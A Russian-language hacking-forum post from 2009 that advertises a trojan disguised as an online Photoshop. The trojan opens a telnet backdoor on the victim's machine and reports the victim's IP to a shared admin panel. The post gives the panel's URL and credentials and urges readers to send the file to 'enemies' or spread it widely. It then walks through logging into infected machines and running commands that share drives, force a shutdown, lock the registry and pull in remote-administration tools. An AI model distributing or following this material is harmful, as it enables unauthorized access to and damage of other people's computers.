Тема: Хотите пошалить в чужих компах на халяву? (Telnet)
Показать сообщение отдельно

Хотите пошалить в чужих компах на халяву? (Telnet)
  #1  
Старый 27.10.2009, 19:04
Vlad&slav
Участник форума
Регистрация: 01.01.2009
Сообщений: 138
Провел на форуме:
817404

Репутация: 82
По умолчанию Хотите пошалить в чужих компах на халяву? (Telnet)
Хотите пошалить в чужих компах на халяву? (Telnet)

Цитата:
Адрес: http://telnetlog.tk/

Логин: admin
Пароль: 123456000
В админке вы можете увидеть IP адреса ,
логин и пароль , порт 972(новые сверху)

Это данные для подключения к чужому компу.

Также вверху есть :
Цитата:
[ MAIN ] - Главная
[ INGECT ] - извлеч список IP адресов чтобы загрузить их куда либо (например хспайдер)
[ FAIL ] - это ссылка скачивания фаила самого вируса для открытия телнета, вирус замаскирован под онлайн фотошоп (ниже подробней)
[ PATCH ] - Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких) подробней тут http://forum.antichat.ru/thread36042.html
Сам фаил вируса:
Его вы можете кинуть неприятелю или разослать где-либо. После этого в админке появится новый IP к которому вы сможете подключиться через телнет.
Также вирус прописывает себя в автозапуск и отстукивает IP при перезагрузке компа жертвы.

Админка сама очищяется через определённое время (внизу написано).

Отчёт с вирустотола http://dumpz.org/13735/ .

Как подключиться и что делать.
Пуск -> Выполнить -> Telnet

в нём пишим open 100.100.100.100 972
если соединение есть то у вас запросят логин и пароль
логин: suser
пароль: 123456 (когда вводите не отображается)

Появляется надпись:
PHP код:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:

PHP код:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul 
перезагрузить комп:
PHP код:
C:>shutdown --t 1 --
прописать какой-нибудь ключ реестра:
PHP код:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /
- который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
PHP код:
C:>ftp 
В общем-то, здесь уже играет фантазия взломщика =)


Делал для себя но пользуюсь мало. Пусть учатся новички работать с консолью. Если можно перенестите в релизы
icq 1000011101101111100110 в бинарной



Последний раз редактировалось Vlad&slav; 27.10.2009 в 19:13..
 
Ответить с цитированием